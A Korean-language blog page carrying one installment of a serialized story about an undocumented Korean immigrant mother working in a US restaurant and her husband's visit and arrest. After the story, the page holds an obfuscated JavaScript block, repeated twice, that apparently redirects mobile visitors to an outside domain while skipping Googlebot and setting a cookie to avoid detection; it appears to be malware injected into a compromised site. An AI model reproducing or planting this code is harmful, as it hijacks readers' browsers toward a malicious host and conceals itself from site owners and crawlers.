아픈다리 서로 기대며 (8)

처음엔 니디아가 담배 할 타임을 잘 배려해 주곤 했다. 3년이 지나면서 주인아주머니도 점심만 지나면 나가셨다 저녁 때 돌아오기도 하지만 어떤 날은 안 돌아 올 때도 가끔씩 있다.

서로가 재혼이었는데 자녀도 없었다. 개인사에 대해서는 거의 말씀이 없다.

때문에 서너 시간은 선미가 모든 걸 체크해야 했다. 오후 이 시간이 한결 여유로운 시간인 것이다.

4년 전,  처음 식당에 나와서 보니 주방에는 한국반찬을 하는 할머니 한분과 스패니쉬 남자 두 명이 있었다. 죠바니와 주방장 보조를 하는 오스카라는 한국말을 여간 잘하는 총각이 그들이다.

‘장모님, 안녕하세요.’ 누구에게서 배웠는지 오스카가 반겨하며 인사를 해왔다. 한국여자만 보면 하는 인사가 ‘장모님’이란다. 처음 봤을 때도 죠바니는 말이 없었다. 수줍은 듯 그냥 웃고만 있었다. 선미보다 2년 먼저 이 식당에 와서 오스카처럼 주방 보조를 하다가 머리가 좋아서 6개월밖에 안 된 시점인데도 한국인주방장이 술 먹고 안 나온 어느 날, 거뜬하게 오더를 처리하는 것을 보고 말썽 많던 비싼 주방장을 내보내고 그때부터 삼호정의 주방장을 꿰 찼다. 밤을 새워가며 그 나름의 레써피를 만들고 주인에게 묻고 해서 주방책임자가 되어버렸던 것이다. 손님들은 삼호정주방장은 당연히 한국 사람인 줄 알고 있다.

imagesCATUGQRS

 

 

주방장과 웨이츄레스는 특별히 좋을 수가 없는 관계다. 업무적인 갈등이 많을 수밖에 없다. 주문서의 체크 잘못에 의한 음식폐기, 맛에 대한 손님의 이런저런 불평, 맛은 없어도 좋으니 무조건 빨리 만을 강조하는 독촉, 문제의 발생은 주방이지만 대부분 불만처리는 서빙의 몫이다. 그렇다고 주방에 불만을 가졌다가는 거의 일을 못할 정도로 주방에서 여러 가지 골탕을 교묘하게 부릴 수 있는 위치에 있기 때문에 주방이 항상 위이다.

죠바니가 주방을 맡은 뒤로는 그런 일들이 일거에 정리가 되어버렸다. 성격도 차분한데다 어리고 영리하여 주인의 교통정리에 일체 토를 달지 않았다. 일도 일이지만 선미와는 섬세한 감정이 섞이지가 않기 때문에도 무난할 수밖에 없었다. 가끔씩 멕시코계 니디아와는 티격 거리기도 했지만 선미가 두 사람보다 거의 열 살이나 위이기 때문에 두 사람을 토닥이면 금새 풀어진다. 몸은 피곤해도 특별한 스트레스는 없었다.

 

imagesCAYZUF24

 

 

 

‘삐요, 삐요, 삐요, 삐요’

싸이렌 소리가 유난히 가까워지는 것을 선미가 느끼는 순간, 문을 강하게 두드리는 소리가 들렸다. 윤호가 문을 열자 미국경찰관 세 명이 집안으로 뛰어 들어오며 ‘ 손들어 !’, ‘배 바닥에 붙여!’ 거실에 놀라 서있던 명준을 거칠게 엎드리게 한 뒤, 뒤로 수갑을 채우고 나서 일으켜 세운 뒤 몇 마디를 더하고는 윤호에게 몇 가지를 확인하고 나서 밖으로 나가버렸다.

워낙 순식간에 일어난 일이어서 명준과 말다툼을 한 뒤에 뒤엉켜 몇 차례 머리를 맞은 것 같은데 술 좀하고 해서 앰뷸런스가 오는 줄 알았다.

정신이 번쩍 든 선미는 밖으로 뛰어 나가면서 ‘노우, 노우 !’를  소리쳤지만 벌써 명준을 실은 차는 떠나버리고 세대의 순찰차가 집밖에 남아서 번쩍거리고 있었다.

드라이브웨이에 털썩 주저앉아버렸다. 이웃에서 무슨 일인가 하고 내다본다는 느낌이 드는 순간 오래 그렇게 있을 수만 없었다. 집안으로 얼른 들어왔지만 앞이 깜깜했다.

imagesCASLEPOE

미국에 건너오기 2년 전인 지난 2001년 9월 11일, 뉴욕에서는 엄청난 일이 터져버렸다. 물론 한국에 있을 때니까 그 일이 선미하고 무슨 상관이랴 싶었는데 그게 직접 타격이 될 줄은 그 때는 몰랐었다. 부시 대통령이 취임하게 되면 이민자들에 대한 일제 사면이 이루어지고, 이민 서류가 진행되어 미국생활의 기본이 되는 신분문제가 보다 쉽게 해결될 줄로 믿고 있었다. 그동안 독립적이고 자율적이던 이민국을 그 사건이 터진 뒤로 국토안보부에 통합시켜버리니, 이민자들에게 현미경을 더 들이대고, 이민법이 완화될 턱이 없었다. 이럴 줄 알았으면  비자 만료되기 전에 학생비자로 바꾸고 학생신분이라도 유지했었어야 했다.

하지만 그 땐 그럴 여유도 없었고, 불체자 되는 걸 대수롭게  여기지도 않고 ‘시간이 지나면 해결된다더라.’는 막연한 생각들이 그 때까지만 해도 일반적이었었다.

 

 

일이 이렇게 되고 보니 다시 미국으로 들어오지 않으려면 모를까 한국을 나갈 수가 없게 되어버린 것이다. 그런 사정이 있다고 아무리 이야기를 해도 명준은 막무가내였다. 돈으로  재정적인 압박을 주기 위해서 송금도 끊었다가 어떤 날에는 ‘내일 비행기로 간다.’하고는 전화를 끊기도 하였다. 돈도 궁하고 일은 힘든데 아침에 전화벨이 울리면 소름이 끼쳐왔다.

그래도 달래야 한다고 생각해서 항상 전화는 받아야 했다. 나중에는 아들 바꾸라고 해서 윤호한테 한국말로 욕을 하고 고함을 질러대니 아들도 전화 받기를 회피했다.

그러던 어느 날 한국TV에선가 현장리포트로 ‘기러기엄마’의 생활상과 탈선, 문제점을 취재 하는 걸 봤든지 며칠 전 윤호가 학교 끝나고 와보니 아빠가 집 앞에 서 있더란다.

식당에는 급한 일이 생겨서 오늘 집에 일찍 가 봐야겠다고 하고 집으로 왔다. 전화로는 원수야 악수야 했지만 오랜만에 얼굴을 보니 반갑기도 하고 만감이 교차했다.

어느새 이곳 식으로 그들은 한참동안이나 허그를 했다.

‘어떻게 왔어 ?’

‘비행기 타고,’

‘누가 그걸 몰라, 회사일은 어떻게 하고 왔냐고,’

‘야, 그게 지금 중요해,’ 일부러 고개를 쭈~욱 빼고 좌우로 둘러보면서 ’야, 미국 좋다. 진즉 올 걸 그랬네.’ 그 동안 많이 천연덕스러워지고, 능글능글 거렸다.

언니에게 전화를 했더니 저녁준비 해 놓을 테니 모두 건너오라고 한다. 모처럼 언니 집 식탁이 꽉 찼다. 준호도 고등학생이 되었고 아이들이 더 이상 어린애들이 아니다 보니 먹거리도 푸짐하게 준비한 듯하다.

이런저런 서로의 안부도 하고, 시차도 있으니 김서방 주무시라고 포도주 한잔을 권했다. 포도주를 두 잔하더니 명준은 말이 없어졌다. 졸리는가 싶어서 집으로 서둘러 돌아왔다. 집에 도착해서 그날은 그냥 잤으면 또 아무 일 없이 없었을 지도 모른다.

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

One Reply to “아픈다리 서로 기대며 (8)”